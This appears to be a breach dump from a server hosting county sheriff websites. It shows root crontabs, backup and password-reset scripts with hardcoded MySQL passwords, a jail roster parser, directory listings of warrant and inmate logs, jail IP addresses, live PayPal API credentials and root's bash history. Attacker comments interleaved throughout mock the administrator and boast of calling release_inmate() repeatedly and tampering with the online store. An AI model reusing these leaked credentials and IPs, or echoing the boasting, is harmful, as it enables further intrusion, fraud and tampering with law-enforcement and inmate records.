  1726. /var/www/vhosts/crosscountysheriff.org/httpdocs/cron/purge_events.php
  1727. 1 0 * * * /usr/bin/php
  1728. /var/www/vhosts/cityofwynne.com/httpdocs/cron/purge_events.php
  1729. 1 0 * * * /usr/bin/php
  1730. /var/www/vhosts/boonecountyar.com/httpdocs/cron/purge_events.php
  1731. 1 0 * * * /usr/bin/php
  1732. /var/www/vhosts/barrycountysheriff.com/httpdocs/cron/purge_wanted.php
  1733. 1 0 * * * /usr/bin/php
  1734. /var/www/vhosts/izardcountyar.org/httpdocs/cron/purge_events.php
  1735. 1 0 * * * /usr/bin/php
  1736. /var/www/vhosts/mosheriffs.com/httpdocs/cron/cron.php
  1737. 1 0 * * * /usr/bin/php
  1738. /var/www/vhosts/stfranciscountysheriff.org/httpdocs/cron/purge_events.php
  1739. 1 0 * * * /usr/bin/php
  1740. /var/www/vhosts/knoxcountysheriffil.com/httpdocs/cron/purge_events.php
  1741. */2 * * * * /usr/bin/php
  1742. /var/www/vhosts/gra_upload_scanner.php >/dev/null 2>&1
  1743. 0 1 * * *
  1744. /var/www/vhosts/mostwantedwebsites.net/subdomains/code/httpdocs/search/cron.sh
  1745. >/dev/null
  1746. #
  1747. # BCSD Site Search Cron
  1748. 0 1 * * * cd
  1749. /var/www/vhosts/baxtercountysheriff.com/httpdocs/search/admin/ && /usr/bin/php
  1750. /var/www/vhosts/baxtercountysheriff.com/httpdocs/search/admin/spider.php -u
  1751. http://baxtercountysheriff.com/ -r -n
  1752. http://baxtercountysheriff.com/warrants.php?find=all >/dev/null 2>&1
  1753. #
  1754. # CRCSD Site Search Cron
  1755. 5 1 * * * cd
  1756. /var/www/vhosts/crosscountysheriff.org/httpdocs/search/admin/ && /usr/bin/php
  1757. /var/www/vhosts/crosscountysheriff.org/httpdocs/search/admin/spider.php -u
  1758. http://crosscountysheriff.org/ -r -n
  1759. http://crosscountysheriff.org/warrants.php?find=all >/dev/null 2>&1
  1760. #
  1761. #
  1762. # MCSD Site Search Cron
  1763. 10 1 * * * cd
  1764. /var/www/vhosts/marioncountysheriffar.com/httpdocs/search/admin/ && /usr/bin/php
  1765. /var/www/vhosts/marioncountysheriffar.com/httpdocs/search/admin/spider.php -u
  1766. http://marioncountysheriffar.com/ -r -n
  1767. http://marioncountysheriffar.com/warrants.php?find=all >/dev/null 2>&1
  1768. #
  1769. #
  1770. # SFSOAR Site Search Cron
  1771. 15 1 * * * cd
  1772. /var/www/vhosts/stfranciscountysheriff.org/httpdocs/search/admin/ &&
  1773. /usr/bin/php
  1774. /var/www/vhosts/stfranciscountysheriff.org/httpdocs/search/admin/spider.php -u
  1775. http://stfranciscountysheriff.org/ -r -n
  1776. http://stfranciscountysheriff.org/warrants.php?find=all >/dev/null 2>&1
  1777. #
  1778. #
  1779. # GCSOMS Site Search Cron
  1780. 0 1 * * * cd
  1781. /var/www/vhosts/georgecountymssheriff.com/httpdocs/search/admin/ && /usr/bin/php
  1782. /var/www/vhosts/georgecountymssheriff.com/httpdocs/search/admin/spider.php -u
  1783. http://georgecountymssheriff.com/ -r -n
  1784. http://georgecountymssheriff.com/warrants.php?find=all >/dev/null 2>&1
  1785. #
  1786. #
  1787. # CPSOLA Site Search Cron
  1788. 0 1 * * * cd
  1789. /var/www/vhosts/cameronso.org/httpdocs/search/admin/ && /usr/bin/php
  1790. /var/www/vhosts/cameronso.org/httpdocs/search/admin/spider.php -u
  1791. http://cameronso.org/ -r -n http://cameronso.org/warrants.php?find=all
  1792. >/dev/null 2>&1
  1793. #
  1794. #
  1795. # MCSOGA Site Search Cron
  1796. 0 1 * * * cd
  1797. /var/www/vhosts/meriwethercountysheriff.org/httpdocs/search/admin/ &&
  1798. /usr/bin/php
  1799. /var/www/vhosts/meriwethercountysheriff.org/httpdocs/search/admin/spider.php -u
  1800. http://meriwethercountysheriff.org/ -r -n
  1801. http://meriwethercountysheriff.org/warrants.php?find=all >/dev/null 2>&1
  1802. #
  1803. 47 23 * * * /usr/sbin/ntpdate -b -s time.nist.gov
  1804. #!/bin/sh
  1805.  
  1806. PASSWORD=`cat /etc/psa/.psa.shadow`
  1807.  
  1808. mysqldump -u admin -p$PASSWORD --all-databases --add-drop-table |gzip -v9 >
  1809. /root/mysql_backup.sql.gz
  1810. #!/bin/bash
  1811. #
  1812. # Scan for PHP in upload folders
  1813. #
  1814. EXCLUDES="-e watermark_wanted_photo.php -e checkimages.php -e
  1815. watermark_recalled_photo.php"
  1816. lineify (){
  1817. for i in $*
  1818. do
  1819. echo $i
  1820. done
  1821. }
  1822. # testing
  1823. #EXCLUDES="numnum"
  1824. #
  1825. UHOH=$(/usr/bin/find /var/www/vhosts/*/httpdocs/uploads/*.php | \
  1826. grep -v $EXCLUDES)
  1827. if [ "${UHOH}xx" != "xx" ]
  1828. then
  1829. lineify $UHOH | mail -s "Go Daddy - Upload Scanner" $MAILTO
  1830. fi
  1831.  
  1832.  
  1833. // HARDCODED MYSQL ROOT PASSWORDS... THE SIGN OF ANY SECURE SYSADMIN
  1834.  
  1835. # cat ~root/MASS_PASS/masspass.php
  1836.  
  1837. <?php
  1838. error_reporting(0);
  1839. if(php_sapi_name() == 'cli' && empty($_SERVER['REMOTE_ADDR'])) {
  1840. echo md5('Y9BNtSeb').PHP_EOL;
  1841. //custom safe_query, should work like normal, just allows passing of custom
  1842. connect
  1843. function safe_query($q, $u='', $p='', $d='', $s='localhost'){
  1844. $l = mysql_connect($s,$u,$p) or die("ERROR: Could not connect with USER:
  1845. $u PASS: $p ".PHP_EOL.mysql_error);
  1846. if($d != ''){
  1847. mysql_select_db($d,$l) or die("ERROR: Could not select DATABASE:
  1848. $d".PHP_EOL);
  1849. }
  1850. $r = mysql_query($q,$l)/* or die("ERROR: Could not execute QUERY: $q
  1851. ".PHP_EOL.mysql_error()) */;
  1852. return $r;
  1853. }
  1854.  
  1855. $GD_USER = 'admin';
  1856. $GD_PASS = '8w667nHzx%XFXb';
  1857. $GD_SERV = 'localhost';
  1858.  
  1859. $options = getopt("n::o::");
  1860.  
  1861. $query = 'SHOW DATABASES';
  1862.  
  1863. $result = safe_query($query, $GD_USER, $GD_PASS, '', $GD_SERV);
  1864.  
  1865. while($row = mysql_fetch_array($result,MYSQL_NUM)){
  1866.  
  1867. $query = 'SELECT password FROM dymin_user WHERE username = "bjm"';
  1868. $r = safe_query($query, $GD_USER, $GD_PASS, $row[0], $GD_SERV);
  1869. echo $row[0].' - '.mysql_result($r,0,'password').PHP_EOL;
  1870. if(isset($options['n']) && isset($options['o'])){
  1871. //echo 'UPDATE dymin_user SET password =
  1872. "'.mysql_escape_string($options['n']).'" WHERE username = "bjm" AND password =
  1873. "'.mysql_escape_string($options['o']).'"'.PHP_EOL;
  1874. safe_query('UPDATE dymin_user SET password =
  1875. "'.mysql_escape_string($options['n']).'" WHERE username = "bjm" AND password =
  1876. "'.mysql_escape_string($options['o']).'"', $GD_USER, $GD_PASS, '', $GD_SERV);
  1877. }
  1878. }
  1879.  
  1880. }else{
  1881. echo 'This script can only be ran from the command line!'.PHP_EOL;
  1882. exit();
  1883. }
  1884. ?>
  1885.  
  1886. // GOTTA MAKE SURE TO RM -RF THIS PART FIRST
  1887.  
  1888. # ls -al /backup
  1889.  
  1890. total 318424
  1891. drwxr-xr-x 9 root root 4096 Jul 14 11:30 .
  1892. drwxr-xr-x 26 root root 4096 Feb 22 22:21 ..
  1893. -rw-r--r-- 1 root root 17015 Jul 14 2010 ActiveWarrantsList.txt.back
  1894. -rw-r--r-- 1 root root 175 May 12 09:36 BCSD_PARSE_XML
  1895. drwxrwxrwx 2 root root 4096 Jun 29 18:23 BOCS_WARRANTS
  1896. drwxrwxrwx 2 root root 4096 Jun 29 18:24 CRCSD_WARRANTS
  1897. -rwxrwxrwx 1 root root 20852332 Jul 22 22:20 JONMS_INMATE_ROSTER.log
  1898. -rw-r--r-- 1 root root 90737 Mar 2 08:50 JONMS_INMATE_ROSTER.log.2.gz
  1899. -rwxrwxrwx 1 root root 324196 Feb 7 09:20 JONMS_INMATE_ROSTER.log.gz
  1900. -rwxrwxrwx 1 root root 286813 Oct 28 2010 JONMS_INMATE_ROSTER.log.gz.0
  1901. -rwxrwxrwx 1 root root 88758 Aug 10 2010 JONMS_INMATE_ROSTER.log.gz.1
  1902. -rw-r--r-- 1 root root 13864960 Apr 21 08:19 POALAC04212011.tar
  1903. -rw-r--r-- 1 root root 10833920 Mar 7 16:53 POALAC_BACKUP.tar
  1904. -rw-r--r-- 1 root root 13864960 Apr 20 16:09 POALAC_BACKUP_04202011.tar
  1905. drwxrwxrwx 2 root root 4096 Jun 29 18:24 SFSOAR_WARRANTS
  1906. -rw-r--r-- 1 root root 68177920 May 3 09:47 arsa.05032011.tar
  1907. drwxr-xr-x 3 root root 4096 Apr 21 11:06 bcsd
  1908. -rw-r--r-- 1 root root 55494137 Jul 22 22:20 crcsd_query_log.txt
  1909. -rw-r--r-- 1 root root 1080247 Apr 7 13:05 crcsd_query_log.txt.04072011.gz
  1910. -rwxrwxrwx 1 root root 4181055 Feb 7 09:25 crcsd_query_log.txt.gz
  1911. -rw-r--r-- 1 root root 116504777 Jul 22 22:15 jcsoks_inamte_parse_log.txt
  1912. -rw-r--r-- 1 root root 527887 Apr 7 13:00
  1913. jcsoks_inamte_parse_log.txt.04072011.gz
  1914. -rwxrwxrwx 1 root root 1568892 Feb 7 09:15 jcsoks_inamte_parse_log.txt.gz
  1915. -rw-r--r-- 1 root root 411831 Sep 13 2010 jcsoks_inamte_parse_log.txt.gz.0
  1916. -rwxrwxrwx 1 root root 736089 Feb 8 13:44 jcsoks_query_log.txt.gz
  1917. -rw-r--r-- 1 root root 12029931 Jul 22 22:20 johms_parse_log.txt
  1918. -rw-r--r-- 1 root root 52276 Jun 14 13:30 johms_parse_log.txt.06142011.gz
  1919. -rw-r--r-- 1 root root 24206 Mar 18 10:55 johms_parse_log.txt.gz
  1920. drwxr-xr-x 2 root root 4096 Jul 22 01:00 mail_logs
  1921. drwxr-xr-x 4 root root 4096 Jul 6 2010 parse_logs
  1922. drwx------ 13 root root 4096 Feb 23 00:50 snapshots
  1923. -rw-r--r-- 1 root root 3680191 Jul 22 22:21 stoms_parse_log.txt
  1924. -rw-r--r-- 1 root root 890880 Mar 2 09:18 z
  1925.  
  1926.  
  1927. // NOW THIS LOOKS INTERESTING
  1928. // YOU BETTER BELIEVE WE CALLED release_inmate() MORE THAN A FEW TIMES
  1929.  
  1930. # cat /var/www/vhosts/jocomosheriff.org/home/parse_roster.php
  1931.  
  1932. <?
  1933. if(date('d') == '1' && date('H') < '2'){
  1934. shell_exec('rm /backup/johms_parse_log.txt');
  1935. }
  1936.  
  1937. function safe_query($query){
  1938. $link = mysql_connect('localhost','johms','4smhoj2');
  1939. mysql_select_db('JOHMS',$link);
  1940. return mysql_query($query,$link);
  1941. }
  1942. function parse_csv($filename,$target_table,$field_map){
  1943. $file = file($filename);
  1944. $inmates = array();
  1945. foreach($file as $line_num => $line_data){
  1946. $query = 'INSERT INTO '.$target_table.' SET ';
  1947. $line_data = explode(',',$line_data);
  1948. $i=0;
  1949. $inmates[] = $line_data[0];
  1950. foreach($field_map as $field_num => $db_field){
  1951. if($db_field == 'booking_date'){
  1952. $line_data[$field_num] =
  1953. date('Y-m-d',strtotime($line_data[$field_num])).'", booking_time =
  1954. "'.substr($line_data[$field_num],-8).'';
  1955. //echo $line_data[$field_num],PHP_EOL;
  1956. }
  1957. if($i != 0){
  1958. $query .= ', '.$db_field.' = "'.$line_data[$field_num].'"';
  1959. }else{
  1960. $query .= $db_field.' = "'.$line_data[$field_num].'"';
  1961. }
  1962. $i++;
  1963. }
  1964. //echo $query,PHP_EOL;
  1965.  
  1966. safe_query($query);
  1967. unset($query);
  1968. }
  1969. return $inmates;
  1970. }
  1971.  
  1972. function release_inmate($booking_num){
  1973. $date = date("Y-m-d");
  1974. $time = date("Hi");
  1975. $query = "update dymin_jail_roster set release_date = '$date',
  1976. release_time = '$time' where booking_num = '$booking_num'";
  1977. safe_query($query);
  1978. }
  1979.  
  1980. function is_in_jail($booking_number){
  1981. $query = "select booking_num from dymin_jail_roster where booking_num =
  1982. '$booking_number'";
  1983. $result = safe_query($query);
  1984. $num = mysql_num_rows($result);
  1985. if($num == ''){return false;}else{return true;}
  1986. }
  1987.  
  1988. function build_old_inmates(){
  1989. $inmates = array();
  1990. $r = safe_query('SELECT * FROM dymin_jail_roster WHERE release_date =
  1991. ""');
  1992. while($row = mysql_fetch_array($r)){
  1993. $inmates[] = $row['booking_num'];
  1994. }
  1995. return $inmates;
  1996. }
  1997.  
  1998. function build_new_inmates(){
  1999. $inmates = array();
  2000. $file =
  2001. file('/var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt');
  2002. foreach($file as $line => $data){
  2003. $inmates[] = array_shift(explode(',',$data));
  2004. }
  2005. if(sizeof($inmates)<1){
  2006. echo PHP_EOL,date('m/d/Y H:i:s'),' -- Roster File was
  2007. Empty',PHP_EOL;
  2008. die();
  2009. }
  2010. return $inmates;
  2011. }
  2012.  
  2013. function remove_old_inmates(){
  2014. $now = time();
  2015. $forty_eight_hours_ago = date('Y-m-d', mktime(0, 0, 0, date("m", $now)
  2016. , date("d", $now)-2, date("Y", $now)));
  2017. $query = "select booking_num, image1 from dymin_jail_roster where
  2018. release_date <= '$forty_eight_hours_ago' and release_date != ''";
  2019. $result = safe_query($query);
  2020. while($row = mysql_fetch_array($result,MYSQL_ASSOC)){
  2021. shell_exec('rm -f
  2022. /var/www/vhosts/jocomosheriff.org/httpdocs/images/inmates/resized/'.$row['image1
  2023. ']);
  2024. $query_charges = 'delete from dymin_jail_roster_charges where
  2025. booking_num = "'.$row['booking_num'].'"';
  2026. safe_query($query_charges);
  2027. $query_inmate = 'delete from dymin_jail_roster where booking_num =
  2028. "'.$row['booking_num'].'"';
  2029. safe_query($query_inmate);
  2030. }
  2031. }
  2032.  
  2033. $field_map[0] = 'booking_num';
  2034. $field_map[2] = 'age';
  2035. $field_map[3] = 'gender';
  2036. $field_map[4] = 'race';
  2037. $field_map[5] = 'first_name';
  2038. $field_map[6] = 'middle_name';
  2039. $field_map[7] = 'last_name';
  2040. $field_map[8] = 'booking_date';
  2041. $field_map[9] = 'arresting_agency';
  2042. $field_map[10] = 'image1';
  2043. if(is_file('/var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt')
  2044. && filesize('/var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt') !=
  2045. '4096'){
  2046. $OLDinmates = build_old_inmates();
  2047. $NEWinmates = build_new_inmates();
  2048. //print_r($OLDinmates);
  2049. foreach($OLDinmates as $key => $booking_number){
  2050. if(!in_array($booking_number,$NEWinmates)){
  2051. echo $booking_number,PHP_EOL;
  2052. print_r($NEWinmates);
  2053. echo PHP_EOL;
  2054. release_inmate($booking_number);
  2055. }
  2056. }
  2057. safe_query('DELETE FROM dymin_jail_roster WHERE release_date = ""');
  2058. parse_csv('/var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.
  2059. txt','dymin_jail_roster',$field_map);
  2060. }
  2061. unset($field_map);
  2062. $field_map[0] = 'booking_num';
  2063. $field_map[1] = 'charge';
  2064. $field_map[2] = 'bond';
  2065.  
  2066. if(is_file('/var/www/vhosts/jocomosheriff.org/home/Export/
  2067. RosterChargesExport.txt')){
  2068. safe_query('DELETE FROM dymin_jail_roster_charges');
  2069. safe_query('UPDATE dymin_jail_roster SET charges = "" WHERE release_date
  2070. = ""');
  2071. parse_csv('/var/www/vhosts/jocomosheriff.org/home/Export/
  2072. RosterChargesExport.txt','dymin_jail_roster_charges',$field_map);
  2073.  
  2074.  
  2075. $q = 'SELECT * FROM dymin_jail_roster_charges';
  2076. $r = safe_query($q);
  2077.  
  2078. while($row = mysql_fetch_array($r)){
  2079. $q = 'UPDATE dymin_jail_roster SET charges =
  2080. CONCAT(charges,"'.$row['charge'].'<br>") WHERE release_date = "" AND booking_num
  2081. = "'.$row['booking_num'].'"';
  2082. safe_query($q);
  2083. //echo $q,PHP_EOL;
  2084. }
  2085.  
  2086. $q = 'SELECT * FROM dymin_jail_roster';
  2087. $r = safe_query($q);
  2088.  
  2089. while($row = mysql_fetch_array($r,MYSQL_ASSOC)){
  2090. $q = 'UPDATE dymin_jail_roster SET bond = (SELECT sum(bond) FROM
  2091. dymin_jail_roster_charges WHERE booking_num = "'.$row['booking_num'].'") WHERE
  2092. booking_num = "'.$row['booking_num'].'" AND release_date = ""';
  2093. safe_query($q);
  2094. //echo $q,PHP_EOL;
  2095. }
  2096. }
  2097. remove_old_inmates();
  2098.  
  2099. if(is_file('/var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt')
  2100. ){
  2101. $file = '/var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.txt';
  2102. $newfile =
  2103. '/var/www/vhosts/jocomosheriff.org/home/export_backup/RosterExport_'.date('
  2104. Y_m_d_His').'.txt';
  2105. if (!copy($file, $newfile)) {
  2106. echo "failed to copy $file...\n";
  2107. }else{
  2108. unlink('/var/www/vhosts/jocomosheriff.org/home/Export/RosterExport.
  2109. txt');
  2110. if(is_file('/var/www/vhosts/jocomosheriff.org/home/Export/
  2111. RosterChargesExport.txt')){
  2112. unlink('/var/www/vhosts/jocomosheriff.org/home/Export/
  2113. RosterChargesExport.txt');
  2114. }
  2115. }
  2116. }
  2117. //shell_exec('cp -rpufT
  2118. /var/www/vhosts/jocomosheriff.org/home/Export/Images/
  2119. /var/www/vhosts/jocomosheriff.org/httpdocs/images/inmates/resized/');
  2120. //shell_exec('mogrify -resize 200x200
  2121. /var/www/vhosts/jocomosheriff.org/home/Export/Images/*.jpg');
  2122. //shell_exec('mogrify -resize 200x200
  2123. /var/www/vhosts/jocomosheriff.org/httpdocs/images/inmates/resized/*.jpg');
  2124. shell_exec('chmod -R 777
  2125. /var/www/vhosts/jocomosheriff.org/httpdocs/images/inmates/resized/');
  2126. shell_exec('chown -R root:root
  2127. /var/www/vhosts/jocomosheriff.org/httpdocs/images/inmates/resized');
  2128. $files = scandir('/var/www/vhosts/jocomosheriff.org/home/Export/Images/');
  2129. foreach($files as $k => $v){
  2130. if(strpos($v,'.JPG') !== false || strpos($v,'.jpg') !== false){
  2131. $q = 'SELECT * FROM dymin_jail_roster WHERE image1 LIKE "%'.$v.'%"';
  2132. if(mysql_num_rows(safe_query($q)) > 0){
  2133. if(!is_file('/var/www/vhosts/jocomosheriff.org/httpdocs/images/
  2134. inmates/resized/'.$v)){
  2135. shell_exec('cp -rpufT
  2136. /var/www/vhosts/jocomosheriff.org/home/Export/Images/'.$v.'
  2137. /var/www/vhosts/jocomosheriff.org/httpdocs/images/inmates/resized/'.$v);
  2138. echo 'Copied -
  2139. '.'/var/www/vhosts/jocomosheriff.org/home/Export/Images/'.$v.' TO
  2140. /var/www/vhosts/jocomosheriff.org/httpdocs/images/inmates/resized/'.$v.PHP_EOL;
  2141. }
  2142. }else{
  2143. //do nothing for now
  2144. }
  2145. }
  2146. //echo $v.'<br>';
  2147. }
  2148. $files =
  2149. scandir('/var/www/vhosts/jocomosheriff.org/httpdocs/images/inmates/resized/');
  2150. foreach($files as $k => $v){
  2151. if(strpos($v,'.JPG') !== false || strpos($v,'.jpg') !== false){
  2152. $q = 'SELECT * FROM dymin_jail_roster WHERE image1 LIKE "%'.$v.'%"';
  2153. if(mysql_num_rows(safe_query($q)) > 0){
  2154. echo $v.' - Valid Image'.PHP_EOL;
  2155. shell_exec('mogrify -resize 200x200
  2156. /var/www/vhosts/jocomosheriff.org/httpdocs/images/inmates/resized/'.$v);
  2157. }else{
  2158. //shell_exec('rm -f
  2159. /var/www/vhosts/jocomosheriff.org/httpdocs/images/inmates/resized/'.$v);
  2160. //shell_exec('rm -f
  2161. /var/www/vhosts/jocomosheriff.org/home/Export/'.$v);
  2162. echo 'Removing - '.$v.PHP_EOL;
  2163. }
  2164. }
  2165. //echo $v.'<br>';
  2166. }
  2167. echo PHP_EOL,date('m/d/Y H:i:s'),' -- Finished',PHP_EOL;
  2168. ?>
  2169.  
  2170.  
  2171.  
  2172. # last > last.txt; wc last.txt
  2173. 78726 787247 6061786 last.txt
  2174.  
  2175. // WHY YES THESE ARE JAIL IPS SYNCING THEIR INMATE ROSTER FILES TO THE WEB
  2176.  
  2177. # head -n 5 last.txt
  2178. jonms_sy ftpd8479 173.166.203.165 Sat Jul 23 14:43 - 14:43 (00:00)
  2179. pcsoks_s ftpd8064 24.248.200.101 Sat Jul 23 14:40 - 14:40 (00:00)
  2180. pcsoks_s ftpd8056 24.248.200.101 Sat Jul 23 14:40 - 14:40 (00:00)
  2181. pcsoks_s ftpd8054 24.248.200.101 Sat Jul 23 14:40 - 14:40 (00:00)
  2182. jonms_sy ftpd3730 173.166.203.165 Sat Jul 23 14:28 - 14:28 (00:00)
  2183.  
  2184. // JUST IN CASE ANYONE WANTED TO PLAY WITH THEIR ONLINE STORE. WE SURE DID
  2185.  
  2186. # cat /var/www/vhosts/mosheriffs.com/httpdocs/checkout/constants.php
  2187.  
  2188. <?php
  2189.  
  2190. define('API_TEST_MODE',false);
  2191.  
  2192. /****************************************************
  2193. constants.php
  2194.  
  2195. This is the configuration file for the samples.This file
  2196. defines the parameters needed to make an API call.
  2197.  
  2198. PayPal includes the following API Signature for making API
  2199. calls to the PayPal sandbox:
  2200.  
  2201. API Username sdk-three_api1.sdk.com
  2202. API Password QFZCWN5HZM8VBG7Q
  2203. API Signature A-IzJhZZjhg29XQ2qnhapuwxIDzyAZQ92FRP5dqBzVesOkzbdUONzmOU
  2204.  
  2205. Called by CallerService.php.
  2206. ****************************************************/
  2207.  
  2208. /**
  2209. # API user: The user that is identified as making the call. you can
  2210. # also use your own API username that you created on PayPal�s sandbox
  2211. # or the PayPal live site
  2212. */
  2213.  
  2214. if(!API_TEST_MODE){
  2215. define('API_USERNAME', 'info_api1.mosheriffs.com');
  2216. }else{
  2217. define('API_USERNAME', 'galexa_1252510976_biz_api1.bjmweb.com');
  2218. }
  2219. /**
  2220. # API_password: The password associated with the API user
  2221. # If you are using your own API username, enter the API password that
  2222. # was generated by PayPal below
  2223. # IMPORTANT - HAVING YOUR API PASSWORD INCLUDED IN THE MANNER IS NOT
  2224. # SECURE, AND ITS ONLY BEING SHOWN THIS WAY FOR TESTING PURPOSES
  2225. */
  2226.  
  2227. if(!API_TEST_MODE){
  2228. define('API_PASSWORD', 'X376UUNKW9C665M5');
  2229. }else{
  2230. define('API_PASSWORD', '1252510985');
  2231. }
  2232. /**
  2233. # API_Signature:The Signature associated with the API user. which is generated
  2234. by paypal.
  2235. */
  2236.  
  2237. if(!API_TEST_MODE){
  2238. define('API_SIGNATURE',
  2239. 'AJabrMjdeOUS3ztu4b5tguA358YTAyJmntUHr637CjsXE1pjKGM9MsOH');
  2240. }else{
  2241. define('API_SIGNATURE',
  2242. 'AFcWxV21C7fd0v3bYYYRCpSSRl31AmSHW7t6qw42Zz2AE42uyKKvCZBA');
  2243. }
  2244. /**
  2245. # Endpoint: this is the server URL which you have to connect for submitting your
  2246. API request.
  2247. */
  2248.  
  2249. if(!API_TEST_MODE){
  2250. define('API_ENDPOINT', 'https://api-3t.paypal.com/nvp');
  2251. }else{
  2252. define('API_ENDPOINT', 'https://api-3t.sandbox.paypal.com/nvp');
  2253. }
  2254. /**
  2255. USE_PROXY: Set this variable to TRUE to route all the API requests through
  2256. proxy.
  2257. like define('USE_PROXY',TRUE);
  2258. */
  2259. define('USE_PROXY',FALSE);
  2260. /**
  2261. PROXY_HOST: Set the host name or the IP address of proxy server.
  2262. PROXY_PORT: Set proxy port.
  2263.  
  2264. PROXY_HOST and PROXY_PORT will be read only if USE_PROXY is set to TRUE
  2265. */
  2266. define('PROXY_HOST', '127.0.0.1');
  2267. define('PROXY_PORT', '808');
  2268.  
  2269. /* Define the PayPal URL. This is the URL that the buyer is
  2270. first sent to to authorize payment with their paypal account
  2271. change the URL depending if you are testing on the sandbox
  2272. or going to the live PayPal site
  2273. For the sandbox, the URL is
  2274. https://www.sandbox.paypal.com/webscr&cmd=_express-checkout&token=
  2275. For the live site, the URL is
  2276. https://www.paypal.com/webscr&cmd=_express-checkout&token=
  2277. */
  2278.  
  2279. define('PAYPAL_URL',
  2280. 'https://www.sandbox.paypal.com/webscr&cmd=_express-checkout&token=');
  2281.  
  2282. /**
  2283. # Version: this is the API version in the request.
  2284. # It is a mandatory parameter for each API request.
  2285. # The only supported value at this time is 2.3
  2286. */
  2287.  
  2288. define('VERSION', '59.0');
  2289.  
  2290. ?><?
  2291. session_start();
  2292. include "../config/header.php";
  2293. include "../admin/config/classes/training_academy.php";
  2294. $ta = new training_class('academy');
  2295. $page = new training_class('academy');
  2296. ?>
  2297.  
  2298.  
  2299. // HERE COMES THE BORING PART
  2300.  
  2301. # cat ~root/.bash_history
  2302.  
  2303.  
  2304. less
  2305. /var/www/vhosts/crosscountysheriff.org/httpdocs/admin/modules/warrants/classes/
  2306. warrant_parser.php
  2307. ll
  2308. cd /var/www/vhosts/stfranciscountysheriff.org/
  2309. ll
  2310. cd home/
  2311. ll
  2312. crontab -l
  2313. crontab -l
  2314. /usr/bin/php /var/www/vhosts/stfranciscountysheriff.org/home/warrant_parser.php
  2315. ll
  2316. cd /var/log/
  2317. ll
  2318. less messages | grep 'sfsoar'
  2319. less messages | grep 'sf
  2320. '
  2321. less messages | grep 'stfrancis'
  2322. less messages | grep '16610'
  2323. less messages | grep 'Cross County'
  2324. less messages | grep 'crosscounty'
  2325. less messages | grep 'stfrancis'
  2326. less messages | grep 'boonesheriff'
  2327. l
  2328. ll
  2329. less secure | grep 'sfsoar'
  2330. cd /var/www/vhosts/crosscountysheriff.org/
  2331. cd home/
  2332. ll
  2333. cd Cross\ County/
  2334. ll
  2335. pwd
  2336. cd /var/sql_logs/
  2337. ll
  2338. ll -h
  2339. mkdir -m 755 backup
  2340. ll
  2341. gzip baxtercountysheriff.com
  2342. ll
  2343. gzip mosheriffs.com
  2344. ll
  2345. ll
  2346. mv mosheriffs.com.gz backup/
  2347. ll
  2348. mv baxtercountysheriff.com.gz backup/
  2349. ll
  2350. cd backup/
  2351. ll
  2352. ll -h
  2353. cd ..
  2354. ll
  2355. ll -h
  2356. ll
  2357. cd /var/www/vhosts/jocomosheriff.org/
  2358. cd home/
  2359. ll
  2360. ll
  2361. cd Export/
  2362. ll
  2363. cd Images/
  2364. ll
  2365. cd ..
  2366. ll
  2367. cd ..
  2368. ll
  2369. crontab -l
  2370. /usr/bin/php /var/www/vhosts/jocomosheriff.org/home/parse_roster.php
  2371. ll
  2372. vi parse_roster.php
  2373. cd Export/
  2374. ll
  2375. cd Images/
  2376. ll
  2377. cd ..
  2378. cd ..
  2379. ll
  2380. cd /var/www/vhosts/boonesheriff.com/
  2381. ll
  2382. cd home/
  2383. ll
  2384. less ActiveWarrantsList.txt
  2385. top
  2386. cd /var/www/vhosts/jocomosheriff.org/home/
  2387. ll
  2388. cd Export/
  2389. ll
  2390. cd ..
  2391. ll
  2392. vi parse_roster.php
  2393. /usr/bin/php /var/www/vhosts/jocomosheriff.org/home/parse_roster.php
  2394. vi /var/www/vhosts/jocomosheriff.org/home/parse_roster.php
  2395. /usr/bin/php /var/www/vhosts/jocomosheriff.org/home/parse_roster.php
  2396. /usr/bin/php /var/www/vhosts/jocomosheriff.org/home/parse_roster.php
  2397. /usr/bin/php /var/www/vhosts/jocomosheriff.org/home/parse_roster.php
  2398. cd /var/www/vhosts/crosscountysheriff.org/
  2399. ll
  2400. cd home/
  2401. ll
  2402. cd Cross\ County/
  2403. ll
  2404. cd ..
  2405. ll
  2406. cd Cross\ County/
  2407. ll
  2408. less warrant_parser.php
  2409. cd /backup
  2410. ll
  2411. mkdir -m 777 CRCSD_WARRANTS
  2412. ll
  2413. cd CRCSD_WARRANTS/
  2414. ll
  2415. pwd
  2416. ll
  2417. ll
  2418. crontab -l
  2419. /usr/bin/php /var/www/vhosts/crosscountysheriff.org/home/Cross\
  2420. County/warrant_parser.php
  2421. ll
  2422. less warrant_query.sql
  2423. cd ..
  2424. ll
  2425. pwd
  2426. /usr/bin/php /var/www/vhosts/crosscountysheriff.org/home/Cross\
  2427. County/warrant_parser.php
  2428. /usr/bin/php /var/www/vhosts/crosscountysheriff.org/home/Cross\
  2429. County/warrant_parser.php
  2430. cd CRCSD_WARRANTS/
  2431. ll
  2432. rm warrant_query.sql
  2433. cd ..
  2434. ll
  2435. rm warrant_query.sql
  2436. ll
  2437. cd CRCSD_WARRANTS/
  2438. ll
  2439. ll
  2440. ll -h
  2441. ll
  2442. ll
  2443. ll
  2444. cd ..
  2445. mkdir -m 777 BOCS_WARRANTS
  2446. ll
  2447. mkdir -m 777 SFSOAR_WARRANTS
  2448. ll
  2449. du -sh
  2450. du -sh ./
  2451. du -sh ./*
  2452. ll
  2453. ll
  2454. cd SFSOAR_WARRANTS/
  2455. ll
  2456. ll
  2457. ll
  2458. ll
  2459. ll
  2460. ll
  2461. ll
  2462. crontab -l
  2463. /usr/bin/php /var/www/vhosts/stfranciscountysheriff.org/home/warrant_parser.php
  2464. crontab -e
  2465. ll
  2466. cd /var/www/vhosts/crosscountysheriff.org/home/
  2467. ll
  2468. cd Cross\ County/
  2469. ll
  2470. ll -h
  2471. ll
  2472. ll
  2473. crontab -l
  2474. /usr/bin/php /var/www/vhosts/crosscountysheriff.org/home/Cross\
  2475. County/warrant_parser.php
  2476. crontab -l
  2477. /usr/bin/php /var/www/vhosts/boonesheriff.com/home/warrant_parser.php >/dev/null
  2478. 2>&1
  2479. ll
  2480. cd /var/www/vhosts/boonesheriff.com/home/
  2481. ll
